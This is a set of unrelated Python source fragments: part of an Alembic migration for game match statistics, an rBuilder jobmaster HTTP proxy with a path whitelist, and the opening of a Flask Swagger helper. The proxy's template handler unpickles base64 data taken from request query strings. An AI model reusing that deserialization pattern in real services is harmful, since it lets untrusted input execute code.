    sa.Column('cult_converted', sa.Integer(), nullable=True),
    sa.Column('cult_tomes_created', sa.Integer(), nullable=True),
    sa.Column('cult_narsie_summoned', sa.Boolean(), nullable=True),
    sa.Column('cult_narsie_corpses_fed', sa.Integer(), nullable=True),
    sa.Column('cult_surviving_cultists', sa.Integer(), nullable=True),
    sa.Column('cult_deconverted', sa.Integer(), nullable=True),
    sa.Column('xeno_eggs_laid', sa.Integer(), nullable=True),
    sa.Column('xeno_faces_hugged', sa.Integer(), nullable=True),
    sa.Column('xeno_faces_protected', sa.Integer(), nullable=True),
    sa.Column('blob_wins', sa.Boolean(), nullable=True),
    sa.Column('blob_spawned_blob_players', sa.Integer(), nullable=True),
    sa.Column('blob_spores_spawned', sa.Integer(), nullable=True),
    sa.Column('blob_res_generated', sa.Integer(), nullable=True),
    sa.Column('malf_won', sa.Boolean(), nullable=True),
    sa.Column('malf_shunted', sa.Boolean(), nullable=True),
    sa.Column('revsquad_won', sa.Boolean(), nullable=True),
    sa.Column('start_datetime', sa.DateTime(), nullable=True),
    sa.Column('end_datetime', sa.DateTime(), nullable=True),
    sa.PrimaryKeyConstraint('id'),
    # A given log file may only be imported once.
    sa.UniqueConstraint('parsed_file')
    )
    op.create_index(op.f('ix_match_mastermode'), 'match', ['mastermode'], unique=False)
    # Lookup table referenced by the match_revsquad_item association table.
    op.create_table('revsquad_item',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('name', sa.String(), nullable=True),
    sa.PrimaryKeyConstraint('id')
    )
    # Per-match detail tables; each gets an index on match_id for joins.
    op.create_table('antag_objective',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('match_id', sa.Integer(), nullable=True),
    sa.Column('mindname', sa.String(length=100), nullable=True),
    sa.Column('mindkey', sa.String(length=30), nullable=True),
    sa.Column('special_role', sa.String(length=30), nullable=True),
    sa.Column('objective_type', sa.String(length=45), nullable=True),
    sa.Column('objective_desc', sa.String(), nullable=True),
    sa.Column('objective_succeeded', sa.Boolean(), nullable=True),
    sa.Column('target_name', sa.String(length=100), nullable=True),
    sa.Column('target_role', sa.String(length=100), nullable=True),
    sa.ForeignKeyConstraint(['match_id'], ['match.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_index(op.f('ix_antag_objective_match_id'), 'antag_objective', ['match_id'], unique=False)
    op.create_table('badass_bundle_buy',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('match_id', sa.Integer(), nullable=True),
    sa.Column('mindname', sa.String(), nullable=True),
    sa.Column('mindkey', sa.String(length=30), nullable=True),
    sa.Column('traitor_buyer', sa.Boolean(), nullable=True),
    sa.ForeignKeyConstraint(['match_id'], ['match.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_index(op.f('ix_badass_bundle_buy_match_id'), 'badass_bundle_buy', ['match_id'], unique=False)
    op.create_table('death',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('match_id', sa.Integer(), nullable=True),
    sa.Column('mindname', sa.String(length=100), nullable=True),
    sa.Column('mindkey', sa.String(length=30), nullable=True),
    sa.Column('typepath', sa.String(length=200), nullable=True),
    sa.Column('special_role', sa.String(length=100), nullable=True),
    sa.Column('assigned_role', sa.String(length=100), nullable=True),
    sa.Column('time_of_death', sa.Integer(), nullable=True),
    sa.Column('death_x', sa.Integer(), nullable=True),
    sa.Column('death_y', sa.Integer(), nullable=True),
    sa.Column('death_z', sa.Integer(), nullable=True),
    sa.Column('damage_brute', sa.Integer(), nullable=True),
    sa.Column('damage_fire', sa.Integer(), nullable=True),
    sa.Column('damage_toxin', sa.Integer(), nullable=True),
    sa.Column('damage_oxygen', sa.Integer(), nullable=True),
    sa.Column('damage_clone', sa.Integer(), nullable=True),
    sa.Column('damage_brain', sa.Integer(), nullable=True),
    sa.ForeignKeyConstraint(['match_id'], ['match.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_index(op.f('ix_death_match_id'), 'death', ['match_id'], unique=False)
    op.create_table('explosion',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('match_id', sa.Integer(), nullable=True),
    sa.Column('epicenter_x', sa.Integer(), nullable=True),
    sa.Column('epicenter_y', sa.Integer(), nullable=True),
    sa.Column('epicenter_z', sa.Integer(), nullable=True),
    sa.Column('devestation_range', sa.Integer(), nullable=True),
    sa.Column('heavy_impact_range', sa.Integer(), nullable=True),
    sa.Column('light_impact_range', sa.Integer(), nullable=True),
    sa.ForeignKeyConstraint(['match_id'], ['match.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_index(op.f('ix_explosion_match_id'), 'explosion', ['match_id'], unique=False)
    # Many-to-many association tables (composite primary keys).
    op.create_table('match_malf_module',
    sa.Column('match_id', sa.Integer(), nullable=False),
    sa.Column('module_id', sa.Integer(), nullable=False),
    sa.ForeignKeyConstraint(['match_id'], ['match.id'], ),
    sa.ForeignKeyConstraint(['module_id'], ['malf_module.id'], ),
    sa.PrimaryKeyConstraint('match_id', 'module_id')
    )
    op.create_table('match_revsquad_item',
    sa.Column('match_id', sa.Integer(), nullable=False),
    sa.Column('item_id', sa.Integer(), nullable=False),
    sa.ForeignKeyConstraint(['item_id'], ['revsquad_item.id'], ),
    sa.ForeignKeyConstraint(['match_id'], ['match.id'], ),
    sa.PrimaryKeyConstraint('match_id', 'item_id')
    )
    op.create_table('population_snapshot',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('match_id', sa.Integer(), nullable=True),
    sa.Column('popcount', sa.Integer(), nullable=True),
    sa.Column('time', sa.DateTime(), nullable=True),
    sa.ForeignKeyConstraint(['match_id'], ['match.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_index(op.f('ix_population_snapshot_match_id'), 'population_snapshot', ['match_id'], unique=False)
    op.create_table('survivor',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('match_id', sa.Integer(), nullable=True),
    sa.Column('mindname', sa.String(), nullable=True),
    sa.Column('mindkey', sa.String(length=30), nullable=True),
    sa.Column('special_role', sa.String(), nullable=True),
    sa.Column('mob_typepath', sa.String(), nullable=True),
    sa.Column('damage_brute', sa.Integer(), nullable=True),
    sa.Column('damage_fire', sa.Integer(), nullable=True),
    sa.Column('damage_toxin', sa.Integer(), nullable=True),
    sa.Column('damage_oxygen', sa.Integer(), nullable=True),
    sa.Column('damage_clone', sa.Integer(), nullable=True),
    sa.Column('damage_brain', sa.Integer(), nullable=True),
    sa.ForeignKeyConstraint(['match_id'], ['match.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_index(op.f('ix_survivor_match_id'), 'survivor', ['match_id'], unique=False)
    op.create_table('uplink_buy',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('match_id', sa.Integer(), nullable=True),
    sa.Column('mindname', sa.String(), nullable=True),
    sa.Column('mindkey', sa.String(length=30), nullable=True),
    sa.Column('traitor_buyer', sa.Boolean(), nullable=True),
    sa.Column('bundle_path', sa.String(), nullable=True),
    sa.Column('item_path', sa.String(), nullable=True),
    sa.ForeignKeyConstraint(['match_id'], ['match.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_index(op.f('ix_uplink_buy_match_id'), 'uplink_buy', ['match_id'], unique=False)
    # References badass_bundle_buy (created above), not match directly.
    op.create_table('badass_bundle_item',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('badass_bundle_id', sa.Integer(), nullable=True),
    sa.Column('item_path', sa.String(), nullable=True),
    sa.ForeignKeyConstraint(['badass_bundle_id'], ['badass_bundle_buy.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_index(op.f('ix_badass_bundle_item_badass_bundle_id'), 'badass_bundle_item', ['badass_bundle_id'], unique=False)
    # ### end Alembic commands ###
def downgrade():
    """Drop every table created by :func:`upgrade`.

    Tables are dropped in reverse dependency order (children before
    `match` and the lookup tables) so foreign keys never dangle; each
    explicit index is dropped before its table.
    """
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_index(op.f('ix_badass_bundle_item_badass_bundle_id'), table_name='badass_bundle_item')
    op.drop_table('badass_bundle_item')
    op.drop_index(op.f('ix_uplink_buy_match_id'), table_name='uplink_buy')
    op.drop_table('uplink_buy')
    op.drop_index(op.f('ix_survivor_match_id'), table_name='survivor')
    op.drop_table('survivor')
    op.drop_index(op.f('ix_population_snapshot_match_id'), table_name='population_snapshot')
    op.drop_table('population_snapshot')
    op.drop_table('match_revsquad_item')
    op.drop_table('match_malf_module')
    op.drop_index(op.f('ix_explosion_match_id'), table_name='explosion')
    op.drop_table('explosion')
    op.drop_index(op.f('ix_death_match_id'), table_name='death')
    op.drop_table('death')
    op.drop_index(op.f('ix_badass_bundle_buy_match_id'), table_name='badass_bundle_buy')
    op.drop_table('badass_bundle_buy')
    op.drop_index(op.f('ix_antag_objective_match_id'), table_name='antag_objective')
    op.drop_table('antag_objective')
    op.drop_table('revsquad_item')
    op.drop_index(op.f('ix_match_mastermode'), table_name='match')
    op.drop_table('match')
    op.drop_table('malf_module')
    # ### end Alembic commands ###
| |
#!/usr/bin/python
#
# Copyright (c) SAS Institute Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Implements a proxy that relays status, results, etc. upstream to the rBuilder.
When a node is started we store a mapping from their IPv6 address to the
URL of the rBuilder that created the job that the node is running. Then any
requests that come in are checked first to see if they are addressed to a
feature of the jobmaster itself (e.g. the template generator). If not, the
request path is checked against a whitelist and forwarded to the originating
rBuilder.
"""
import asyncore
import base64
import cgi
import cPickle
import errno
import logging
import os
import re
import socket
import sys
import threading
import urllib
import urlparse
import weakref
from conary.lib.log import setupLogging
from jobmaster.templategen import TemplateGenerator
log = logging.getLogger(__name__)
#: Whitelist of request paths that may be proxied to the originating
#: rBuilder, keyed by HTTP method. Requests not matching any pattern for
#: their method are rejected with 403 (see ProxyClient.do_proxy).
#: Patterns are raw strings so regex escapes like \d are explicit rather
#: than relying on Python passing unknown string escapes through.
ALLOWED_PATHS = {
    'GET': [
        # NOTE(review): the unescaped '?' makes the final 'e' optional
        # ('/downloadImag' also matches); if a literal query-string '?'
        # was intended this should be r'^/downloadImage\?' — confirm
        # before changing, as the permissive form is backward-compatible.
        re.compile(r'^/downloadImage?.*'),
        re.compile(r'^/images/'),
    ],
    'POST': [
        re.compile(r'^/api/v1/images/\d+/build_log$'),
    ],
    'PUT': [
        re.compile(r'^/uploadBuild/\d+/'),
        re.compile(r'^/api/v1/images/\d+/?$'),
        re.compile(r'^/api/v1/images/\d+/build_files$'),
    ],
}
class ConnectionClosed(Exception):
    """Internal control-flow exception: raised by handlers to tear down a
    proxied connection; caught in ProxyDispatcher.handle_error, which
    closes the dispatcher without logging it as an error."""
    pass
class ProxyServer(asyncore.dispatcher):
    """Listening socket for the jobmaster proxy.

    Accepts IPv6 TCP connections and spawns a ProxyClient per connection.
    Also keeps a reference-counted map from client address to the rBuilder
    URL that requests from that address should be relayed to.
    """
    def __init__(self, port=0, _map=None, jobmaster=None):
        # port=0 lets the OS pick an ephemeral port; the chosen port is
        # published as self.port.
        asyncore.dispatcher.__init__(self, None, _map)
        # Weakref so the proxy does not keep the jobmaster alive.
        self.jobmaster = jobmaster and weakref.ref(jobmaster)
        self.create_socket(socket.AF_INET6, socket.SOCK_STREAM)
        self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.bind(('::', port))
        self.port = self.socket.getsockname()[1]
        self.listen(5)
        # Guards targetMap: {address: (targetUrl, refcount)}. Accessed
        # from both the asyncore loop and the threads that start nodes.
        self.lock = threading.Lock()
        self.targetMap = {}
    def serve_forever(self):
        """Run the asyncore event loop until it exits."""
        asyncore.loop(use_poll=True, map=self._map)
    def handle_accept(self):
        # Drain all pending connections; EAGAIN means the backlog is empty.
        while True:
            try:
                sock, _ = self.socket.accept()
            except socket.error, err:
                if err.args[0] == errno.EAGAIN:
                    break
                raise
            else:
                # The new ProxyClient registers itself in the poll map,
                # which keeps it alive.
                ProxyClient(sock, self._map, self)
    def addTarget(self, address, targetUrl):
        """Map a node address to its originating rBuilder URL.

        Re-adding the same (address, url) pair bumps a refcount; a
        conflicting URL for an existing address is an error.
        """
        if not isinstance(address, basestring):
            # Presumably an address object with a format() method
            # (e.g. an IP address wrapper) — normalized to a string key.
            address = address.format(useMask=False)
        self.lock.acquire()
        try:
            (existing, refs) = self.targetMap.get(address, (None, 0))
            if existing and existing != targetUrl:
                raise RuntimeError("You must use network containers when "
                        "sharing a jobmaster between head nodes")
            refs += 1
            self.targetMap[address] = (targetUrl, refs)
        finally:
            self.lock.release()
    def removeTarget(self, address):
        """Drop one reference to an address mapping; remove it at zero."""
        if not isinstance(address, basestring):
            address = address.format(useMask=False)
        self.lock.acquire()
        try:
            (targetUrl, refs) = self.targetMap[address]
            assert refs > 0
            refs -= 1
            if refs:
                self.targetMap[address] = (targetUrl, refs)
            else:
                del self.targetMap[address]
        finally:
            self.lock.release()
    def findTarget(self, address):
        """Return the rBuilder URL for an address, or None if unknown."""
        self.lock.acquire()
        try:
            target = self.targetMap.get(address)
            if target is None:
                return None
            (targetUrl, refs) = target
            assert refs > 0
            return targetUrl
        finally:
            self.lock.release()
# Per-connection parser states: reading an HTTP header; copying an entity
# body (to EOF / by Content-Length / by chunked encoding); copying a
# chunked-transfer trailer; or flushing the send queue before close.
(STATE_HEADER, STATE_COPY_ALL, STATE_COPY_SIZE, STATE_COPY_CHUNKED,
        STATE_COPY_TRAILER, STATE_CLOSING) = range(6)
class ProxyDispatcher(asyncore.dispatcher):
    """asyncore handler for the jobmaster proxy server.

    Base class for both sides of a proxied connection (ProxyClient and
    ProxyUpstream). Implements buffered non-blocking send/recv, HTTP
    header parsing, and entity-body copying (identity, Content-Length and
    chunked framing) to the paired socket. Subclasses implement
    handle_header(). All fatal conditions raise ConnectionClosed, which
    handle_error() turns into a close.
    """
    chunk_size = 8192
    # Back-pressure limit for both in_buffer and the pair's out_buffer.
    buffer_threshold = chunk_size * 8
    def __init__(self, sock, _map, server, pair=None):
        asyncore.dispatcher.__init__(self, sock, _map)
        # Weakrefs avoid reference cycles; the asyncore poll map holds
        # the strong references that keep dispatchers alive.
        self._server = weakref.ref(server)
        self.in_buffer = self.out_buffer = ''
        self.state = STATE_HEADER
        self.copy_remaining = 0L
        self._remote = None  # cached peer name for logging
        self._pair = pair and weakref.ref(pair) or None
    @property
    def server(self):
        # Dereferenced ProxyServer (may be None if it was collected).
        return self._server()
    @property
    def pair(self):
        # Dereferenced paired dispatcher, or None if unset/collected.
        return self._pair and self._pair()
    @property
    def name(self):
        """'[host]:port' of the peer, for log messages; cached."""
        if not self.socket:
            return ''
        if self._remote is None:
            try:
                peer = self.socket.getpeername()
            except:
                # Peer may already be gone; remember the failure.
                self._remote = ''
            else:
                self._remote = '[%s]:%s' % peer[:2]
        return self._remote
    @staticmethod
    def _parse_header(header):
        """Split a raw HTTP header blob into (first line, {lowercased
        header name: value}). Malformed lines without ':' are skipped."""
        lines = header.rstrip().split('\r\n')
        firstline = lines.pop(0)
        headers = {}
        for line in lines:
            if ':' not in line:
                continue
            key, value = line.split(':', 1)
            value = value.lstrip()
            headers[key.lower()] = value
        return firstline, headers
    # Sending machinery
    def send(self, data):
        """
        Send C{data} as soon as possible, without blocking.
        """
        self.out_buffer += data
        self._do_send()
    def _do_send(self):
        """
        Try to send the current contents of the send queue.
        """
        if not self.connected:
            # Connection still in progress; handle_connect will flush.
            return
        while self.out_buffer:
            try:
                sent = self.socket.send(self.out_buffer)
            except socket.error, err:
                if err.args[0] == errno.EAGAIN:
                    # OS send queue is full; save the rest for later.
                    break
                else:
                    if err.args[0] not in (errno.ECONNRESET, errno.EPIPE):
                        log.debug("Closing socket due to write error %s",
                                str(err))
                    raise ConnectionClosed
            else:
                self.out_buffer = self.out_buffer[sent:]
        if self.state == STATE_CLOSING:
            # Write buffer is flushed; close it now.
            raise ConnectionClosed
    def handle_write(self):
        self._do_send()
    def writable(self):
        # Also poll for writability while connecting, so handle_connect
        # fires.
        return (not self.connected) or len(self.out_buffer)
    # Receiving machinery
    def handle_read(self):
        try:
            data = self.socket.recv(self.chunk_size)
        except socket.error, err:
            if err.args[0] == errno.EAGAIN:
                # OS recv queue is empty.
                return
            else:
                if err.args[0] not in (errno.ECONNRESET, errno.EPIPE):
                    log.debug("Closing socket due to read error %s", str(err))
                raise ConnectionClosed
        # NOTE(review): 'True or ...' makes this condition always true,
        # so the STATE_CLOSING check is dead code and data is buffered
        # even while draining for close — confirm whether that was the
        # intent before removing either half.
        if True or self.state != STATE_CLOSING:
            self.in_buffer += data
            self._do_recv()
        if not data:
            # Zero-byte read: peer closed the connection.
            raise ConnectionClosed
    def _do_recv(self):
        """
        Try to process the contents of the input queue.
        """
        last = None
        while self.in_buffer:
            # Keep processing until the input buffer stops shrinking.
            if (self.state, len(self.in_buffer)) == last:
                break
            last = self.state, len(self.in_buffer)
            if self.state == STATE_HEADER:
                # Skip blank lines like those Conary likes to send when it
                # hasn't received any data for a while.
                while self.in_buffer.startswith('\r\n'):
                    self.in_buffer = self.in_buffer[2:]
                end = self.in_buffer.find('\r\n\r\n')
                if end > -1:
                    end += 4
                    header, self.in_buffer = (self.in_buffer[:end],
                            self.in_buffer[end:])
                    self.handle_header(header)
                elif len(self.in_buffer) > self.buffer_threshold:
                    log.warning("Dropping connection due to excessively large "
                            "header.")
                    raise ConnectionClosed
            else:
                self.handle_copy()
    def readable(self):
        # Read data if we're processing headers (not copying), or we're copying
        # and the pair socket is not full.
        return ((not self.connected) or self.state == STATE_HEADER
                or self.pair_copyable())
    def handle_header(self, header):
        # Subclass hook: called with each complete header blob.
        raise NotImplementedError
    # Copying machinery
    def copyable(self):
        """Return True if the output buffer can accept more bytes."""
        return len(self.out_buffer) < self.buffer_threshold
    def pair_copyable(self):
        """Return True if there is a pair socket and it is copyable."""
        return self.pair and self.pair.copyable()
    def start_copy(self, headers):
        """Set copy mode based on the info in the given headers."""
        assert self.state == STATE_HEADER
        if 'transfer-encoding' in headers:
            if headers['transfer-encoding'] != 'chunked':
                log.error("Don't know how to copy transfer encoding %r",
                        headers['transfer-encoding'])
                raise ConnectionClosed
            self.copy_remaining = 0L
            self.state = STATE_COPY_CHUNKED
        elif 'content-length' in headers:
            self.copy_remaining = long(headers['content-length'])
            self.state = STATE_COPY_SIZE
        else:
            # No framing info: copy until the connection closes.
            self.state = STATE_COPY_ALL
    def handle_copy(self):
        """Handle input while in copy mode."""
        if not self.pair:
            # Copy to whom?
            raise ConnectionClosed
        if self.state == STATE_COPY_ALL:
            copyBytes = len(self.in_buffer)
        elif self.state == STATE_COPY_SIZE:
            copyBytes = min(len(self.in_buffer), self.copy_remaining)
            if not copyBytes:
                # Done copying fixed-length entity; back to reading headers.
                self.state = STATE_HEADER
                return
        elif self.state == STATE_COPY_CHUNKED:
            if not self.copy_remaining:
                # Read the size of the next chunk.
                end = self.in_buffer.find('\r\n')
                if end < 0:
                    if len(self.in_buffer) > self.buffer_threshold:
                        log.warning("Very large chunk header; "
                                "closing connection.")
                        raise ConnectionClosed
                    # No chunk header yet.
                    return
                header = self.in_buffer[:end].split(';')[0]
                try:
                    next_size = int(header, 16)
                except ValueError:
                    log.error("Bad chunk header; closing connection.")
                    raise ConnectionClosed
                # Copy the chunk-size line itself plus the chunk data.
                self.copy_remaining = end + 2 + next_size
                if next_size:
                    # Copy the CRLF after the chunk data.
                    self.copy_remaining += 2
                else:
                    # Last chunk. Switch to trailer mode.
                    self.state = STATE_COPY_TRAILER
            copyBytes = min(len(self.in_buffer), self.copy_remaining)
        elif self.state == STATE_COPY_TRAILER:
            if len(self.in_buffer) < 2:
                # Not enough bytes to determine whether there is a trailer.
                return
            elif self.in_buffer[:2] == '\r\n':
                # No trailer.
                copyBytes = 2
            else:
                end = self.in_buffer.find('\r\n\r\n')
                if end < 0:
                    return
                # Trailer found.
                copyBytes = end + 4
            self.state = STATE_HEADER
        else:
            assert False
        # Relay the selected span to the paired socket.
        buf = self.in_buffer[:copyBytes]
        self.in_buffer = self.in_buffer[copyBytes:]
        self.pair.send(buf)
        if self.state in (STATE_COPY_SIZE, STATE_COPY_CHUNKED):
            self.copy_remaining -= copyBytes
    # Cleanup machinery
    def handle_close(self):
        """Handle an asyncore close event."""
        # Throw to make sure further events don't get called, and so there is
        # only one place that close events get handled.
        raise ConnectionClosed
    def handle_error(self):
        """Handle an asyncore error event."""
        e_class = sys.exc_info()[0]
        if e_class is not ConnectionClosed:
            log.exception("Unhandled exception in proxy handler; "
                    "closing connection:")
        self.close()
    def close(self):
        """Close the dispatcher object and its socket."""
        asyncore.dispatcher.close(self)
        # Detach from the pair first so pair_closed can't recurse back.
        pair, self._pair = self.pair, None
        if pair:
            pair.pair_closed()
    def pair_closed(self):
        """Handle the paired socket having closed."""
        # Default: no-op; subclasses override.
class ProxyClient(ProxyDispatcher):
    """Dispatcher for a connection from a node to the proxy.

    Requests to /templates/ are served locally (template generator);
    whitelisted paths are relayed to the node's originating rBuilder via
    a paired ProxyUpstream; everything else is rejected.
    """
    upstream = None
    def pair_closed(self):
        """Handle the upstream socket closing by changing to CLOSED state."""
        if self.out_buffer:
            # Don't close the connection until the send queue is empty.
            self.state = STATE_CLOSING
        else:
            self.close()
    def handle_header(self, request):
        """
        Parse a request from the client and direct it where it needs to go.
        """
        requestline, headers = self._parse_header(request)
        words = requestline.split()
        if len(words) != 3:
            log.error("Dropping client with unsupported request line: %s",
                    requestline)
            raise ConnectionClosed
        method, path, version = words
        if version != 'HTTP/1.1':
            log.error("Dropping client with unsupported HTTP version %s",
                    version)
            raise ConnectionClosed
        log.debug('%s "%s"', self.name, requestline)
        if path.startswith('/templates/'):
            return self.do_templates(method, path, headers)
        else:
            return self.do_proxy(request, method, path, headers)
    def send_response(self, response, headers, body=''):
        """Send a simple HTTP response."""
        headers.append('Content-Length: %s' % len(body))
        self.send('HTTP/1.1 %s\r\n%s\r\n\r\n%s' % (response,
            '\r\n'.join(headers), body))
    def send_text(self, response, body):
        """Send a simple HTTP response with text/plain content."""
        self.send_response(response, ['Content-Type: text/plain'], body)
    def do_proxy(self, request, method, path, headers):
        """Attempt to proxy a request upstream."""
        # Reject anything not on the per-method whitelist.
        proxyOK = False
        paths = ALLOWED_PATHS.get(method)
        if paths:
            for pattern in paths:
                if pattern.match(path):
                    proxyOK = True
                    break
        if not proxyOK:
            return self.send_text('403 Forbidden',
                    'Proxying not permitted\r\n')
        if self.pair:
            # Reuse the existing upstream connection.
            self.pair.send(request)
        else:
            # Note that we don't need to keep a strong reference to the paired
            # connection because one is kept in the asyncore poll map.
            upstream = ProxyUpstream(None, self._map, self._server(), self)
            upstream._pair = weakref.ref(self)
            # Queued; flushed once the upstream connection completes.
            upstream.send(request)
            self._connect(upstream)
        # Switch to body-copy mode for this request's entity, if any.
        self.start_copy(headers)
    def _connect(self, upstream):
        """Resolve this client's rBuilder target and start connecting
        the given upstream dispatcher to it (non-blocking)."""
        # Figure out who we're proxying to.
        peer = self.socket.getpeername()[0]
        url = self.server.findTarget(peer)
        if not url:
            return self.send_text('403 Forbidden', 'Peer not recognized\r\n')
        # Split the URL to get the hostname.
        scheme, url = urllib.splittype(url)
        if scheme != 'http':
            return self.send_text('504 Gateway Timeout',
                    'Invalid target URL\r\n')
        host, port = _split_hostport(urllib.splithost(url)[0])
        # Resolve the hostname to an address.
        try:
            addresses = socket.getaddrinfo(host, port, 0, socket.SOCK_STREAM)
        except socket.gaierror, err:
            log.error("Error resolving target URL: %s", err)
            addresses = []
        if not addresses:
            return self.send_text('504 Gateway Timeout',
                    'Unknown target URL\r\n')
        # Create the right socket type and initiate the connection (which may
        # not complete immediately).
        family, socktype, _, _, address = addresses[0]
        upstream.create_socket(family, socktype)
        upstream.connect(address)
        self._pair = weakref.ref(upstream)
    def do_templates(self, method, path, headers):
        """Handle a request to get anaconda templates."""
        # NOTE(review): header values are strings, so a request carrying
        # an explicit 'Content-Length: 0' compares '0' != 0 and is
        # rejected here even though it has no body — confirm if intended.
        clength = headers.get('content-length', 0)
        if clength != 0:
            # Implementing this would add a lot of complexity for something we
            # can handle entirely in URI parameters.
            return self.send_text('400 Bad Request',
                    'Request body not allowed here.\r\n')
        # Figure out who we're proxying to.
        peer = self.socket.getpeername()[0]
        url = self.server.findTarget(peer)
        if not url:
            return self.send_text('403 Forbidden', 'Peer not recognized\r\n')
        # Figure out what they want.
        path, _, query = urlparse.urlparse(path)[2:5]
        assert path.startswith('/templates/')
        path = path[11:]
        query = cgi.parse_qs(query)
        if method == 'GET' and path == 'getTemplate':
            try:
                # Parameters arrive as a base64ed pickle in the 'p' field.
                # NOTE(review): unpickling request data is only safe
                # because callers are the jobmaster's own nodes.
                blob = base64.urlsafe_b64decode(query['p'][0])
                params = cPickle.loads(blob)
            except:
                log.warning("Bad getTemplate request:", exc_info=True)
                return self.send_text('400 Bad Request',
                        'Bad arguments for getTemplate\r\n')
            start = not query.get('nostart', 0)
            if start:
                log.debug("Client requested template %s=%s[%s]",
                        *params['templateTup'][0])
            jobmaster = self.server.jobmaster()
            assert jobmaster
            conaryCfg = jobmaster.getConaryConfig(url)
            workDir = jobmaster.cfg.getTemplateCache()
            generator = TemplateGenerator(params['templateTup'],
                    params['kernelTup'], conaryCfg, workDir)
            status, path = generator.getTemplate(start)
            path = os.path.basename(path)
            if generator.pid:
                # Make sure the main event loop will reap the generator when it
                # quits.
                jobmaster.subprocesses.append(generator)
            return self.send_text('200 OK', '%s\r\n%s\r\n' % (
                generator.Status.values[status], path))
        else:
            return self.send_text('404 Not Found', 'Unknown function\r\n')
class ProxyUpstream(ProxyDispatcher):
    """Dispatcher for the proxy's connection to the rBuilder.

    Mirrors ProxyClient: relays the rBuilder's responses back to the
    paired client, switching to body-copy mode based on each response's
    framing headers.
    """
    def pair_closed(self):
        # Client went away: nothing left to relay to, drop immediately.
        self.close()
    def handle_connect(self):
        if not self.pair:
            raise ConnectionClosed
        # Flush any request data queued while the connect was in flight.
        self._do_send()
    def handle_read(self):
        if not self.pair:
            raise ConnectionClosed
        ProxyDispatcher.handle_read(self)
    def handle_header(self, response):
        """Forward a response header to the client, entering copy mode
        for its entity body unless it is a 1xx interim response."""
        responseline, headers = self._parse_header(response)
        code = responseline.split(' ', 2)[1]
        code = int(code)
        if 100 <= code < 200:
            # 1xx codes don't have an entity.
            pass
        else:
            self.start_copy(headers)
        self.pair.send(response)
def _split_hostport(host):
i = host.rfind(':')
j = host.rfind(']')
if i > j:
port = int(host[i+1:])
host = host[:i]
else:
port = 80
if host and host[0] == '[' and host[-1] == ']':
host = host[1:-1]
return host, port
def test():
    """Ad-hoc manual entry point: run a proxy on port 7770 with debug
    logging until interrupted. Sending SIGUSR1 to the printed pid opens
    an epdb remote-debugger session for live inspection."""
    import epdb, signal
    print os.getpid()
    def hdlr(signum, sigtb):
        epdb.serve()
    signal.signal(signal.SIGUSR1, hdlr)
    setupLogging(consoleLevel=logging.DEBUG, consoleFormat='file')
    s = ProxyServer(7770)
    try:
        asyncore.loop(use_poll=True)
    except KeyboardInterrupt:
        # Bare print emits a newline so ^C doesn't mangle the prompt.
        print
if __name__ == '__main__':
    test()
| |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, absolute_import
import re
from inspect import isclass, getdoc
from collections import Hashable
from six import string_types, itervalues, iteritems, iterkeys
from flask import current_app
from ._compat import OrderedDict
from . import fields
from .model import Model, ModelBase
from .reqparse import RequestParser
from .utils import merge, not_none, not_none_sorted
#: Maps Flask/Werkzeug routing converter types to Swagger ones
PATH_TYPES = {
    'int': 'integer',
    'float': 'number',
    'string': 'string',
    None: 'string',
}
#: Maps Python primitive types to Swagger ones
# NOTE(review): imported via `from collections import Hashable` above,
# which is removed in Python 3.10+ (moved to collections.abc) — confirm
# supported Python versions before upgrading.
PY_TYPES = {
    int: 'integer',
    str: 'string',
    bool: 'boolean',
    None: 'void'
}
# Matches a Werkzeug placeholder like <int:pet_id>, capturing only the
# parameter name (used to rewrite rules into Swagger '{name}' form).
RE_URL = re.compile(r'<(?:[^:<>]+:)?([^<>]+)>')
# Same placeholder syntax, but captures the full 'converter:name' token.
RE_PARAMS = re.compile(r'<((?:[^:<>]+:)?[^<>]+)>')
DEFAULT_RESPONSE_DESCRIPTION = 'Success'
DEFAULT_RESPONSE = {'description': DEFAULT_RESPONSE_DESCRIPTION}
# Matches Sphinx-style ':raises Name: description' lines in docstrings.
RE_RAISES = re.compile(r'^:raises\s+(?P<name>[\w\d_]+)\s*:\s*(?P<description>.*)$', re.MULTILINE)
def ref(model):
    '''Return a JSON ``$ref`` pointer to *model* in the definitions.

    Accepts either a registered model object (its ``name`` is used) or a
    plain model name.
    '''
    if isinstance(model, ModelBase):
        name = model.name
    else:
        name = model
    return {'$ref': '#/definitions/{0}'.format(name)}
def _v(value):
'''Dereference values (callable)'''
return value() if callable(value) else value
def extract_path(path):
    '''
    Transform a Flask/Werkzeug URL pattern into a Swagger one.

    e.g. ``/pets/<int:pet_id>`` becomes ``/pets/{pet_id}``.
    '''
    return RE_URL.sub('{\\1}', path)
def extract_path_params(path):
    '''
    Extract Flask-style URL parameters as Swagger path parameters.

    :raises ValueError: for a converter that has no Swagger mapping and
        is not registered on the current app's URL map.
    '''
    params = OrderedDict()
    for token in RE_PARAMS.findall(path):
        if ':' in token:
            descriptor, name = token.split(':')
        else:
